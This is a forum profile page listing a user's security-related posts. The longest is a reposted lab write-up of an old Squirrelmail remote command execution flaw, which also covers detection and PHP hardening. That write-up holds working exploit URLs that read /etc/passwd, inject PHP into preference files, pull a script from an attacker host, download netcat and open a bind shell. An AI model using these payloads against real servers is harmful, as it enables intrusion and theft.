-
Posts
1376 -
Joined
-
Last visited
-
Days Won
17
Everything posted by ZeroCold
-
The American security Agency NSA is infamous for its mass surveillance programs. Every alternate day, we are greeted with new revelations regarding its policies and tools being used to track people. Recently, it was announced that NSA will be continuing its phone spying program for another six months. Putting aside the numerous allegations, NSA has open sourced one of its cyber security tools. The security agency has released the source code of the system integrity management platform, SIMP, on GitHub. NSA has taken this step to help the government departments and private organizations to improve their security measures. SIMP aims to enhance the network security systems’ efficiency by keeping them updated and compliant with the latest security standards. It is a part of a layered and defense-in-depth approach to the security. NSA says that this cyber security tool release is to avoid duplicity as certain US governments and groups were trying to forge the tool to meet the minimum security standards set by US intelligence and defense bodies. At this point of time, only RHEL (Red Hat Enterprise Linux) versions 7.1 and 6.6 and CentOS versions 7.1-1503-01 and 6.6 are supporting SIMP. Recently, NSA launched its technology transfer program to develop new technologies in public as well as the private sector. Linda Burger, Director of the program, said that open sourcing of the federal laboratory products is very efficient. She added that the open source community should leverage NSA’s work that will benefit the society and the nation. Such programs and open sourcing efforts have seen the daylight due to the leaks by former NSA contractor Edward Snowden. Read the release here.
-
###### Info ###### Title : Beyond SQLi: Obfuscate and Bypass Author : "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan" Team : CWH Underground [http://www.exploit-db.com/author/?a=1275] Date : 2011-10-06 ########## Contents ########## [0x00] - Introduction [0x01] - Filter Evasion (Mysql) [0x01a] - Bypass Functions and Keywords Filtering [0x01b] - Bypass Regular Expression Filtering [0x02] - Normally Bypassing Techniques [0x03] - Advanced Bypassing Techniques [0x03a] - HTTP Parameter Pollution: Split and Join [0x03b] - HTTP Parameter Contamination [0x04] - How to protect your website [0x05] - Conclusion [0x06] - References [0x07] - Greetz To #Link: https://www.exploit-db.com/papers/17934/ @Nytro, Aveti un bug pe campul tags, se completeaza automat cu mai mult de 5 taguri si nu te lasa sa postezi sau sa dai preview. E aiurea daca vrei sa formatezi un articol/tutorial.
-
- 2
-
- ##########
- bypass
-
(and 3 more)
Tagged with:
-
Va salut! Daca ar fi sa va dati licenta pe domeniul securitatii informatice, ce titlu ati alege sau despre ce ati scrie? (Incerc sa gasesc un titlu, un "subdomeniu" ca sa zic asa si nu pot sa ma hotarasc). Mersi!
-
E un pdf, nu are rost sa dau copy/paste, va pun doar link-ul. Also, asta cred ca ar trebui pus pinned pe undeva. Link: https://ugc.futurelearn.com/uploads/related_file/file/6921/83ab50301b94a1043043b9fb9b6ef4f8-Week_3_Sophos_Threatsaurus_AZ.pdf
-
Aveti link aici: https://www.futurelearn.com/courses/introduction-to-cyber-security
-
Ca programator php fara exeperienta eu luam undeva la 1100/luna, program de 5 zile / saptamana, 6 ore pe zi. Dar pe langa programare mai faceam si alte chestii (gen instalari bloguri, SEO, plati si ce mai era nevoie). Aveam program flexibil puteam sa ma duc cand vroiam si sa plec la fel important era sa fac alea 6 ore in intervalul 8 dim. - 8 seara, daca nu reuseam stateam a 2-a zi mai mult
-
Nu cred ca mai am arhiva, dar daca am timp weekend-ul asta o sa fac altul la fel de simplist. (nu imi mai dati PM-uri referitoare la postul asta, va rog...)
-
Mi-a cerut cineva sa uploadez si laboratoarele 1 si 9. Laboratorul 1 contine Norme de prevenire a incendiilor si prostii de genul, nu cred ca intereseaza pe cineva, iar laboratorul 9 este defapt laboratorul 10. E trecut pe site ca fiind 9 dar in titlul pdf-ului este 10. Le-am pus si pe zippy: csi.rar (aceeasi parola)
-
Laboratoare anul 3 Criptarea si Securitatea Informatiei. Download: csi.rar Mirror: csi.rar PW: zero@RST
-
Intro There has been a lot of excitement around the new htaccess authentication bypass tool called HTExploit (HiperText Access Exploit [1]) that was recently presented at the Arsenal station at Blackhat USA 2012. This tool abuses a very old attack made possible due to a common htaccess configuration issue. Being an industry that loves to name old things anew, we now call this attack HTTP Verb Tampering. HTTP Verb Tampering HTTP Verb Tampering is an idea that was talked about in attack scenarios as far back as 2004 [2]. The attacks stems from restricting resources based on a white or blacklist of http methods. The methods outside of those defined in this restricted list may have unintended consequences like allowing an attacker to bypass the authentication requirement. Let’s take a look at a sample htaccess file that uses the problematic LIMIT directive: AuthName “restrict posting” AuthType Basic AuthUserFile /usr/local/etc/httpd/users < Limit POST > require group staff < /Limit > *http://www.apacheweek.com/features/userauth The intended idea of the author was to only allow those in the staff group to post content to the restricted resource(s). Unfortunately for the developer, this is exactly how it works. This only limits the POST http method to require staff group authentication, any other http methods such as GET and PUT will bypass this authentication requirement. HEAD Bypass So the developer decided to deny methods like PUT, DELETE, and OPTIONS at the webserver and then only allow GET and POST methods from authenticated users. They modified their htaccess file to look like: AuthName “restrict access” AuthType Basic AuthUserFile /usr/local/etc/httpd/users < Limit GET POST > require group staff < /Limit > In 2008 another paper was released [3] that named the attack and pointed out that the RFC for http/1.1 [4] says to treat head requests like get requests in the data returned. This allows us to send a HEAD request to bypass this limit restriction and retrieve the content without authenticating. Custom Method Finally, let’s say the developer went through the HTTP RFC’s and limited all known methods, even those denied at the webserver. One may think this would protect the resource(s) from all known methods. Take a look at the new example: AuthName “restrict all methods” AuthType Basic AuthUserFile /usr/local/etc/httpd/users < Limit > POST GET PUT DELETE SPACEJUMP DEBUG OPTIONS TRACE CONNECT PROPFIND LOCK UNLOCK PROPPATCH MKCOL COPY MOVE> require group staff < /Limit > In reality, anything that is called by Apache is displayed back as if it were retrieved by GET. This was created to take advantage of modules that may use custom methods such as WebDav. In this case we can create our own HTTP Method and use that to retrieve content, bypassing any limit restriction. The HTExploit tool uses ‘POTATO’ while the paper from 2004 uses ”BILBOA’. Protection The first style of protection is to use the directive instead of . LimitExcept causes a limit to be placed on any method except the ones specified. This allows you to require authentication for POST and GET and deny every other http method from accessing the resource. This would look like: AuthName “restrict all methods except” AuthType Basic AuthUserFile /usr/local/etc/httpd/users < LimitExcept GET POST > require group staff < /LimitExcept > The second style of protection is to completely remove any form of http method limit and only require authenticated users to access the resource(s). This would simply remove any limit directives: AuthName “restrict all methods except” AuthType Basic AuthUserFile /usr/local/etc/httpd/users require group staff By Tyler Borland, Security Researcher References [1] HTExploit - Bypassing htaccess Restrictions – HTExploit Tool [2] www.kernelpanik.org/docs/kernelpanik/bme.eng.pdf – Original htaccess Misconfiguration Attack Methods [3] https://www.aspectsecurity.com/research/aspsec_presentations/download-bypassing-web-authentication-and-authorization-with-http-verb-tampering/ – HEAD Bypass [4] HTTP/1.1: Method Definitions – RFC HTTP/1.1 HTTP Methods #Sursa: https://www.alertlogic.com/blackhat-review-of-htaccess-tricks/
-
Exploit Details Remote command execution vulnerabilities in Squirrelmail None Linux, Unix, Windows 95, 98, NT, 2000 (Any operating system capable of running PHP) HTTP, HTTPS, HTML with embedded PHP scripting An attacker can run arbitrary commands on the remote web server by executing library files and overwriting script variables that aren't properly initialized. Description of Protocols Used in Exploit HTTP and HTTPS HTTP and HTTPS are protocols that carry requests for web pages and web page content between web servers and web browser applications. Parameters within HTTP requests, such as cookie content and form and querystring variables, are easy to manipulate. This allows an attacker to send "false" information or input to the server that the web-application developer did not expect. HTML (Hypertext Markup Language) is a specification for formatting content to be displayed within a web browser. PHP PHP is a functional programming language that can be embedded within HTML pages to generate dynamic content. PHP code is executed on the web server. PHP is designed to be very powerful and easy to use. Some features of PHP that help accomplish this are: • Variables do not need to be declared, variables will be automatically initialized the first time they are used. • A global variable is created for each HTTP form, querystring, and cookie parameter contained in the HTTP request before any script execution begins. • PHP includes hundreds of built-in functions, including the ability to read and write files and execute other programs on the server. How the Exploit Works This section describes a configuration that can be used to duplicate the attack. It then outlines the vulnerabilities in the Squirrelmail source code and PHP scripting language that enable the exploit. Finally two versions of the attack will be shown. The "Basic Attack" simply uses specially crafted URL's to read or write to files on the victim web server. The "Advanced Attack" then uses these capabilities and other features of Squirrelmail to initiate a remote shell on the victim web server. Attack Diagram Test Network Configuration The exploit was duplicated on a closed test-lab network consisting of a RedHat Linux web server (the victim) and a Windows NT Workstation desktop (the attacker's machine). Web Server (Victim) Configuration Here are the steps used to build the webserver and install and configure Squirrelmail. • Format the drive and clean install RedHat 7.1 • Use the "Server" installation script with default settings • Download and install the Red Hat package containing the Cyrus IMAP daemon version 2.0.9-3 • Download and unpack Squirrelmail version 1.0.4 • The installation of Squirrelmail is detailed in the document "INSTALL" that is distributed with the program. Here are the steps followed from the "INSTALL" document. • Place the "squirrelmail" folder in /var/www/html so it is readable by the webserver • Give the webserver user write access to the squirrelmail/data directory using the following commands: $ chown -R apache data $ chgrp -R apache data • Create an attachments directory outside of the squirrelmail folder using the following commands: $ cd /var/www $ mkdir attachments $ chgrp -R apache attachments $ chmod 730 attachments • Run Squirrelmail/config/conf.pl to configure Squirrelmail to use the newly created directories • Use the "ntsysv" program to start the cyrus(IMAP) service and the http service Windows NT Workstation (Attacker) configuration The software of interest on the attacker's machine includes: • Microsoft Internet Explorer 4.01 and Netscape Navigator 4.72. These browsers will be used to send URL requests to the web server. • Microsoft Internet Information Server 4.0 Web Service. This service will be used to serve PHP commands that the web server will download and execute. • Microsoft Internet Information Server 4.0 FTP Service. This service will be used to download the "netcat" binary to the victim web server so a remote shell can be opened. Tools Used for Attack • Microsoft Internet Explorer 4.01 • Text Editor • Netcat for Windows NT • Netcat binary for RedHat linux (Compiled with GAPING_SECURITY_HOLE) Reading files from the web server (Basic Attack) The first vulnerability in Squirrelmail allows an attacker to read information from any file to which the web server user account has rights without logging in to the server. Here are the attributes of the Squirrelmail code that work together to allow this to happen: • Many variables are not declared or initialized before they are used. • There are a number of shared "library" files that are called from the Squirrelmail PHP scripts. These library files are not meant to be called directly by the web user, but the default configuration allows them to be. Here is a block of code from one of the library files, "load_prefs.php": 38 if ((isset($chosen_theme)) && (file_exists($chosen_theme))) { 39 require("$chosen_theme"); 40 } else { 41 if (file_exists($theme[0]["PATH"])) { 42 require($theme[0]["PATH"]); 43 } else { If the library file "load_prefs.php" is called directly by the web browser, $theme[0]["PATH"] is not initialized before it is used here. Since PHP allows us to create a globally-scoped variable simply by passing that variable as an HTTP GET or POST parameter, or even a cookie value, it is easy for the user to initialize this variable to any value. Inspection of additional code in "load_prefs.php" reveals that one must also provide the following variables to get the code above to execute by directly calling load_prefs.php. • $username (can be anything) • $config_php = true • $data_dir = the directory of the Squirrelmail data directory. This could be guessed, or there are vulnerabilities in Squirrelmail that will provide this information. This vulnerability can be found in Remote command execution vulnerabilities in Squirrelmail (http://www.securereality.com.au/sradv00010.txt ). We use the above information to craft a specific URL to send to Squirrelmail. This URL can be loaded using any web browser, such as Internet Explorer. http://172.17.1.10/squirrelmail/src/load_prefs.php?username=nobody&config_php=true&theme[0] ((-->) [PATH]=/etc/passwd&data_dir=/var/www/html/squirrelmail/data When the web server loads this URL and parses the script, the PHP variable $theme[0][PATH] is set to "/etc/passwd". When the script executes " 42 require($theme[0]["PATH"]); ", the contents of /etc/passwd will be pushed to the screen. If a different file that contained PHP code had been specified, that PHP code would have been executed. Writing to files on the webserver (Basic Attack) The second vulnerability in Squirrelmail allows an attacker to write to files on a web server with the rights of the web server application without logging into that server. Here are the attributes of the Squirrelmail code that work together to allow this to happen: • Many variables are not declared or initialized before they are used. • Form input is not verified to be valid before it is acted upon. One file that can be written to in the Squirrelmail application is the user's "preferences" file. Each user has a preferences file, and to allow the user to change his or her preferences it needs to have write access by the web server application. Here is a sample preferences file: [root@localhost data]# cat kevin.pref full_name= reply_to= chosen_theme=../themes/default_theme.php order1=1 order2=2 order3=3 order4=5 order5=4 One script that modifies the preferences file is "options_order.php". This script allows the user to change the order in which email header fields are displayed on the screen. The following code block shows how option order changes are written to the preferences file: 83 } else if ($method == 'add' && $add) { 84 $index_order[count($index_order)+1] = $add; 85 } 86 87 if ($method) { 88 for ($i=1; $i <= count($index_order); $i++) { 89 setPref($data_dir, $username, "order$i", $index_order[$i]); 90 } 91 } If the attacker runs this script and sets the variable $method to "add", then whatever is in the variable $add will be written to the preferences file. Using the above information one can figure out an http request to send to the Squirrelmail web server to exploit this vulnerability: http://172.17.1.10/squirrelmail/src/opt((-->) i ons_order.php?username=kevin&method=add&add=<?php%20passthru("/bin/ls%20/etc")?> The result of the above command is the to have the string "<?php passthru("/bin/ls /etc")?> written to the file kevin.pref in the Squirrelmail data directory: [kbong@localhost data]$ cat kevin.pref full_name= reply_to= chosen_theme=../themes/default_theme.php order1=1 order2=2 order3=3 order4=5 order5=4 order6=<?php passthru("/bin/ls /etc")?> Executing Arbitrary Commands on the webserver It has been shown that an attacker can use the Squirrelmail vulnerability to read and parse with PHP any file on the webserver to which the webserver process has read rights. An attacker can also write to any file on the webserver to which the webserver process has write rights. If the attacker combines these two abilities with some other features of PHP scripting she will have the ability to execute any command on the webserver that the webserver process would have the rights to execute. A sample of this ability is shown below. Example use of the exploit (Advanced Attack) Here is a real-world example of how an attacker could use the exploit to get a remote shell on the victim web server. The goal in this example is to download a "netcat" binary to the webserver and use it to launch a command shell that an attacker can connect to via TCP/IP. This example will also demonstrate some of the other features of the PHP scripting language that can make a system more vulnerable to attack. These features include: • The ability to execute extenal programs on the server • The ability to download software from another server using FTP, HTTP, etc. • The ability to "include" PHP script from a remote server into the local script. Preparation Here are the steps to prepare for the attack. • Locate the Netcat binary One first needs to place the "netcat" binary in a location it can be download it from. Since there is no firewall between the attacker and victim in this example FTP will be used. The netcat binary for Redhat linux 7.1 is named "nc.exe" and placed in the ftp root directory on the attacker's machine. Anonymous FTP is enabled. • Provide PHP script for downloading the netcat binary. A default install of PHP includes the ability to download files using FTP. The following script uses this ability to download the netcat binary. This script is named "phpftpdownload.txt" and placed in the root web directory on the attacker's webserver. I will show later how this script will be downloaded and executed on the victim's server. Contents of phpftpdownload.txt <?php // set up basic connection $conn_id = ftp_connect("172.17.1.2"); // login with username and password $login_result = ftp_login($conn_id, "anonymous", "foo@bar.com"); // check connection if ((!$conn_id) || (!$login_result)) { echo "Ftp connection has failed!"; echo "Attempted to connect to $ftp_server for user $user"; die; } else { echo "Connected"; } // upload the file $upload = ftp_get($conn_id, "/var/www/html/squirrelmail/data/nc", "nc", FTP_BINARY); echo $upload; // close the FTP stream ftp_quit($conn_id); ?> The Attack Here are the steps involved in the attack. • Modify a Squirrelmail preferences file on the webserver to include a command to run the netcat download script. The PHP "include()" command has the ability to include and parse a file on a remote server. To read and parse the "phpftpdownload.txt" file on the attacker's server one uses the command "include("http://172.17.1.2/phpftpdownload.txt");" To write the above command to a Squirrelmail preferences file, all you have to do is use Microsoft Internet Explorer to load this URL: http://172.17.1.10/squirrelmail/src/options_order.php?username=kevin&method=add&((-->)) add=<?php%20include("http://172.17.1.2/phpftpdownload.txt")?> Here is the modified preferences file • Modify a Squirrelmail preferences file on the webserver to include a command to change the privileges of the netcat binary to executable After the netcat binary is download it needs to be made executable. One can use the PHP "exec" command to run a command on the victim's server. The command to will run is exec("chmod 777 /var/www/html/squirrelmail/data/nc"); The same process as the previous step is used to write this command to a preferences file on the webserver. Here is the URL: http://172.17.1.10/squirrelmail/src/options_order.php?us e rname=kevin&method=add&add-->) <?php%20exec("chmod%20777%20/var/www/html/squirrelmail/d a ta/nc");%20? > • Modify a Squirrelmail preferences file on the webserver to include a command to have netcat listen on an open port and bind any connections to a shell Again the PHP exec() command is used to launch netcat and start a remote shell listener on port 8888 of the victim. The exact command syntax is exec("/var/www/html/squirrelmail/data/nc -l -p 8888 -e /bin/sh >/dev/null"); This command is written to the preferences file using the URL: http://172.17.1.10/squirrelmail/src/options_order.php?username=kevin&method=add&add=<?((-->)) php%20exec("/var/www/html/squirrelmail/data/nc%20-l%20-p%208888%20-e%20/bin/sh%20>/dev/null");%20? > Here is the preferences file with all three commands written to it. • Send a URL to Squirrelmail which causes it to parse the modified preferences file and execute the attacker's PHP script commands Next one just needs to load a URL that will cause PHP to read the modified preferences file and execute the script commands it now contains. The URL to do this is: http://172.17.1.10/squirrelmail/src/load_prefs.php?username=heyheyhey&config_php=true&theme[0]((-->)) [PATH]=/var/www/html/squirrelmail/data/kevin.pref&data_dir=/var/www/html/squirrelmail/data/ When the script for this URL executes, the victim's server: • Loads and runs the "phpftpdownload.txt" script, which downloads the netcat binary to the data directory • Changes the netcat binary to executable • Launches netcat to listen on port 8888 and launch a shell when someone connects Netcat processes running on victim's server after loading the above URL The netcat process can be seen here, set to listen on port 8888 and execute /bin/sh Listening ports on the victim's server after loading the above URL Port 8888 is shown to be open and listening. • Connect to the remote shell from the attacker's machine using Netcat for NT. From the NT Command Prompt, run "nc 172.17.1.10 8888" Signature of the Attack There are a number of places where evidence of an attacker using the Squirrelmail exploit can be found. These include HTTP Session/packet captures, Apache log files, the fields in the Squirrelmail data directory, and monitoring the running processes and listening ports. Packet Captures/Session Overview Here is a sample of the HTTP session of an attack captured using Achilles: --------------------------------------------------------------- GET /squirrelmail/src/load_prefs.php?username=nobody&config_php=true&theme[0][PATH]=/etc/passwd&data_dir=/var/www/html/squirrelmail/data/ HTTP/1.0 Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT) Host: 172.17.1.10 Proxy-Connection: Keep-Alive Pragma: no-cache --------------------------------------------------------------- --------------------------------------------------------------- HTTP/1.1 200 OK Date: Wed, 26 Sep 2001 15:40:14 GMT Server: Apache/1.3.19 (Unix) (Red-Hat/Linux) mod_ssl/2.8.1 OpenSSL/0.9.6 DAV/1.0.2 PHP/4.0.4pl1 mod_perl/1.24_01 X-Powered-By: PHP/4.0.4pl1 Connection: close Content-Type: text/html root:0:0:root:/root:/bin/bash bin:1:1in:/bin: daemon:2:2aemon:/sbin: adm:3:4:adm:/var/adm: lp:4:7:lp:/var/spool/lpd: sync:5:0:sync:/sbin:/bin/sync shutdown:6:0:shutdown:/sbin:/sbin/shutdown halt:7:0:halt:/sbin:/sbin/halt mail: 8:12 :mail:/var/spool/mail: news: 9:13 :news:/var/spool/news: uucp: 10:14 :uucp:/var/spool/uucp: [file truncated] You can see the HTTP GET request including our specially crafted URL. The response content is a dump of the contents of /etc/password. Apache Log Files Here is a sample of the Apache http log file containing a record of the exploit being used: 172.17.1.2 - - [ 14/Sep/2001 : 10:45:23 -0500] "GET /squirrelmail/src/options_order.php?username=kevin&method=add&add=<%php%20passthru('/bin/ls%20/etc') HTTP/1.1" 200 5864 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT)" 172.17.1.2 - - [ 14/Sep/2001 : 10:46:38 -0500] "GET /squirrelmail/src/load_prefs.php?username=nobody&config_php=true&theme[0][PATH]=/etc/passwd&data_dir=/var/www/html/squirrelmail/data HTTP/1.1" 200 271 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT)" 172.17.1.2 - - [ 14/Sep/2001 : 10:47:29 -0500] "GET /squirrelmail/src/options_order.php?username=kevin&method=add&add=<%php%20passthru("/bin/ls%20/etc")% HTTP/1.1" 200 6238 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT)" The requests for the specially crafted URL's can be seen in the logfile. You can also see the IP address of the attacker and the time that the attack occurred. Files in data directory Here is a sample of a Squirrelmail user preferences file after an attack: [root@localhost data]# pwd /var/www/html/squirrelmail/data [root@localhost data]# cat kevin.pref full_name= reply_to= chosen_theme=../themes/default_theme.php order1=1 order2=2 order3=3 order4=5 order5=4 order6=<?php include("http://172.17.1.2/phpftpdownload.txt"); ?> order7=<?php exec("chmod 777 /var/www/html/squirrelmail/data/nc"); ?> order8=<?php exec("/var/www/html/squirrelmail/data/nc -l -p 8888 -e /bin/sh >/dev/null"); ?> [root@localhost data]# You can see that "order6", "order7" and "order8" contain PHP script that was inserted by the attacker. Running processes The "Basic Attack" will not create any suspicious processes. The Advanced Attack shown above, however, will create a process like this: [root@localhost data]# ps -aux | grep Squirrelmail apache sh -c /var/www/html/squirrelmail/data/nc -l -p 8888 -e /bin/sh >/dev/ The process shown is the netcat application listening on port 8888, set to execute /bin/sh when an attacker connects. Open or Listening ports The "Basic Attack" will not open any new ports. The "Advanced Attack" shown above, however, will create a listener on port 8888. We can see this listener using netstat: [root@localhost data]# netstat -l | grep 8888 tcp 0 0 *:8888 * LISTEN Once an attacker has connected to the remote shell, one can see the established connection: [root@localhost data]# netstat | grep 8888 tcp 0 0 172.17.1.10:8888 172.17.1.2:1573 ESTABLISHED Detecting and preventing the attack Due to the nature of the vulnerability, most traditional security monitoring and blocking tools would not have prevented or detected the attack. Following are a list of common security technologies and how each would have reacted to the attack: Firewall A firewall would not likely have discovered or blocked the Basic Attack. The attack uses the same ports and protocols that normal Squirrelmail users would use to read their email. A firewall may have blocked and detected the Advanced Attack. It used HTTP and FTP originating at the web server to pull files from the attacker, and it ran a remote shell on port 8888. A firewall should most likely be configured to block this traffic. The Advanced Attack could me modified so that it only generates non-suspicious traffic and bypasses the firewall filters. Website Defacement Monitor A website defacement monitor periodically checks a web page or site for content changes. This type of monitor would not likely have discovered the basic attack. The attack did not modify the source code of the website itself, it only modified data files that are modified by the Squirrelmail application during normal use. File Integrity Checker (Tripwire) A File Integrity checker such as tripwire would not likely have discovered the basic attack. This is because the files modified by the attack are data files that are modified during normal use of the Squirrelmail program. Tripwire would usually be set to ignore changes to these files. Tripwire may have discovered the advanced attack if the attacker had used the remote shell to modify files outside of the Squirrelmail data directory. Network Based IDS System A Network Based IDS System would not likely have picked up on the basic attack. Sending URLs to web servers is not a suspicious activity. Since Squirrelmail is not a widely used software package, a Network based IDS would not likely have had the signature of this attack in it's database. A Network Based IDS System would most likely have discovered the Advanced Attack. Since Netcat is often used by hackers, the signature of netcat may be in the IDS database. Also, the FTP, PHP include, and port8888/tcp traffic between the webserver and attacker's machine would be suspicious and probably would be picked up by a Network Based IDS. Again, the Advanced Attack could be modified to not generate suspicious traffic, allowing it to bypass a Network Based IDS. How to fix the Squirrelmail vulnerability The vulnerability has been fixed in versions of Squirrelmail later than 1.0.4. You can download the latest version of Squirrelmail fromSquirrelMail - Webmail for Nuts!. How to secure PHP to limit future vulnerabilities As was seen above, the default installation of PHP is very non-secure, making it difficult to write PHP programs that cannot be exploited. There are a number of configuration options in PHP that will make it more secure. Unfortunately, changing these options will break most existing software packages, including Squirrelmail. These settings are stored in the php.ini file. Here are some of the settings that can be changed: • Set safe_mode to TRUE By default, safe_mode is set to false. Setting safemode to true does the following: • Restricts running external programs on the web server from PHP • Restricts the use of dangerous functions, like include(), ReadFile(), fOpen(), etc. • Restricts access to files based on authentication information • Disables file upload While this setting renders your PHP site much more secure, most PHP software, such as Squirrelmail, will not function with safe_mode set to TRUE • Set register_globals to FALSE This setting will cause PHP not to create a global variable for each URL GET, POST, or Cookie parameter. While this restricts an attacker from initializing your script variables, most PHP software is developed with the assumption that register_globals is set to TRUE. • Set open_basedir The open_basedir setting limits which directories files can be read from. This will keep the user from reading files outside of the PHP script directories. • Set allow_url_fopen to off This setting disables the remote file include feature of PHP that was used in the Advanced Attack. Source/Pseudo Code Source code and specially crafted URL's for the attack were given and described above in the section title "How the Exploit Works". The source code for the vulnerable Squirrelmail application (version 1.0.4) is available from SourceForge at SquirrelMail - Browse Files at SourceForge.net . ------------------------------------------- #SURSA: SANS: Malware FAQ: Remote command execution vulnerabilities in Squirrelmail
-
Tipul are postate cursurile din toti anii + mastere, daca are cineva nevoie le gasiti aici: Home - Cursuri Automatica si Calculatoare Spor la invatat! Edit: Thanks em, cine mai are cursuri, poate lasa un reply.
- 1 reply
-
- 2
-
Daca vrea whitehat, ii recomand SEO | Optimizare SEO | Promovare SEO | Firma SEO Am lucrat si eu o perioada la ei si au rezultate.
-
Hack.me is a FREE, community based project powered by eLearnSecurity. The community can build, host and share vulnerable web application code for educational and research purposes. It aims to be the largest collection of "runnable" vulnerable web applications, code samples and CMS's online. The platform is available without any restriction to any party interested in Web Application Security: students universities researchers penetration testers web developers url: http://www.hack.me
-
- 1
-
Working with HTTP from the command-line is a valuable skill for HTTP architects and API designers to have. The cURL library and curl command give you the ability to design a Request, put it on the pipe, and explore the Response. The downside to the power of curl is how much breadth its options cover. Running curl --help spits out 150 different flags and options. This article demonstrates nine basic, real-world applications of curl. In this tutorial we’ll use the httpkit echo service as our end point. The echo server’s Response is a JSON representation of the HTTP request it receives. Make a Request Let’s start with the simplest curl command possible. Request curl http://echo.httpkit.com Response { "method": "GET", "uri": "/", "path": { "name": "/", "query": "", "params": {} }, "headers": { "host": "echo.httpkit.com", "user-agent": "curl/7.24.0 ...", "accept": "*/*" }, "body": null, "ip": "28.169.144.35", "powered-by": "http://httpkit.com", "docs": "http://httpkit.com/echo" } Just like that we have used curl to make an HTTP Request. The method, or “verb”, curl uses, by default, is GET. The resource, or “noun”, we are requestion is addressed by the URL pointing to the httpkit echo service, http://echo.httpkit.com. You can add path and query string parameters right to the URL. Request curl http://echo.httpkit.com/path?query=string Response { ... "uri": "/path?query=string", "path": { "name": "/path", "query": "?query=string", "params": { "query": "string" } }, ... } Set the Request Method The curl default HTTP method, GET, can be set to any method you would like using the -X option. The usual suspects POST, PUT, DELETE, and even custom methods, can be specified. Request curl -X POST echo.httpkit.com Response { "method": "POST", ... } As you can see, the http:// protocol prefix can be dropped with curl because it is assumed by default. Let’s give DELETE a try, too. Request curl -X DELETE echo.httpkit.com Response { "method": "DELETE", ... } Set Request Headers Request headers allow clients to provide servers with meta information about things such as authorization, capabilities, and body content-type. OAuth2 uses an Authorization header to pass access tokens, for example. Custom headers are set in curl using the -H option. Request curl -H "Authorization: OAuth 2c4419d1aabeec" \ http://echo.httpkit.com Response {... "headers": { "host": "echo.httpkit.com", "authorization": "OAuth 2c4419d1aabeec", ...}, ...} Multiple headers can be set by using the -H option multiple times. Request curl -H "Accept: application/json" \ -H "Authorization: OAuth 2c3455d1aeffc" \ http://echo.httpkit.com Response { ... "headers": { ... "host": "echo.httpkit.com", "accept": "application/json", "authorization": "OAuth 2c3455d1aeffc" }, ... } Send a Request Body Many popular HTTP APIs today POST and PUT resources using application/json or application/xml rather than in an HTML form data. Let’s try PUTing some JSON data to the server. Request curl -X PUT \ -H 'Content-Type: application/json' \ -d '{"firstName":"Kris", "lastName":"Jordan"}' echo.httpkit.com Response { "method": "PUT", ... "headers": { ... "content-type": "application/json", "content-length": "40" }, "body": "{\"firstName\":\"Kris\",\"lastName\":\"Jordan\"}", ... } Use a File as a Request Body Escaping JSON/XML at the command line can be a pain and sometimes the body payloads are large files. Luckily, cURL’s @readfile macro makes it easy to read in the contents of a file. If we had the above example’s JSON in a file named “example.json” we could have run it like this, instead: Request curl -X PUT \ -H 'Content-Type: application/json' \ -d @example.json echo.httpkit.com POST HTML Form Data Being able to set a custom method, like POST, is of little use if we can’t also send a request body with data. Perhaps we are testing the submission of an HTML form. Using the -d option we can specify URL encoded field names and values. Request curl -d "firstName=Kris" \ -d "lastName=Jordan" \ echo.httpkit.com Response { "method": "POST", ... "headers": { "content-length": "30", "content-type":"application/x-www-form-urlencoded" }, "body": "firstName=Kris&lastName=Jordan", ... } Notice the method is POST even though we did not specify it. When curl sees form field data it assumes POST. You can override the method using the -X flag discussed above. The “Content-Type” header is also automatically set to “application/x-www-form-urlencoded” so that the web server knows how to parse the content. Finally, the request body is composed by URL encoding each of the form fields. POST HTML Multipart / File Forms What about HTML forms with file uploads? As you know from writing HTML file upload form, these use a multipart/form-data Content-Type, with the enctype attribute in HTML. In cURL we can pair the -F option and the @readFile macro covered above. Request curl -F "firstName=Kris" \ -F "publicKey=@idrsa.pub;type=text/plain" \ echo.httpkit.com Response { "method": "POST", ... "headers": { "content-length": "697", "content-type": "multipart/form-data; boundary=----------------------------488327019409", ... }, "body": "------------------------------488327019409\r\n Content-Disposition: form-data; name=\"firstName\"\r\n\r\n Kris\r\n ------------------------------488327019409\r\n Content-Disposition: form-data; name=\"publicKey\"; filename=\"id_rsa.pub\"\r\n Content-Type: text/plain\r\n\r\n ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAkq1lZYUOJH2 ... more [a-zA-Z0-9]* ... naZXJw== krisjordan@gmail.com\n\r\n ------------------------------488327019409 --\r\n", ...} Like with the -d flag, when using -F curl will automatically default to the POST method, the multipart/form-data content-type header, calculate length, and compose the multipart body for you. Notice how the @readFile macro will read the contents of a file into any string, it’s not just a standalone operator. The “;text/plain” specifies the MIME content-type of the file. Left unspecified, curl will attempt to sniff the content-type for you. Test Virtual Hosts, Avoid DNS Testing a virtual host or a caching proxy before modifying DNS and without overriding hosts is useful on occassion. With cURL just point the request at your host’s IP address and override the default Host header cURL sets up. Request curl -H "Host: google.com" 50.112.251.120 Response { "method": "GET", ... "headers": { "host": "google.com", ... }, ... } View Response Headers APIs are increasingly making use of response headers to provide information on authorization, rate limiting, caching, etc. With cURL you can view the headers and the body using the -i flag. Request curl -i echo.httpkit.com Response HTTP/1.1 200 OK Server: nginx/1.1.19 Date: Wed, 29 Aug 2012 04:18:19 GMT Content-Type: application/json; charset=utf-8 Content-Length: 391 Connection: keep-alive X-Powered-By: http://httpkit.com { "method": "GET", "uri": "/", ... } # Sursa: 9 uses for cURL worth knowing | httpkit | Tools for hacking on HTTP
-
- 1
-
Un experiment interesant: Ce m-au invatat 3 luni de barba despre presiunea sociala | Succes Dublu
-
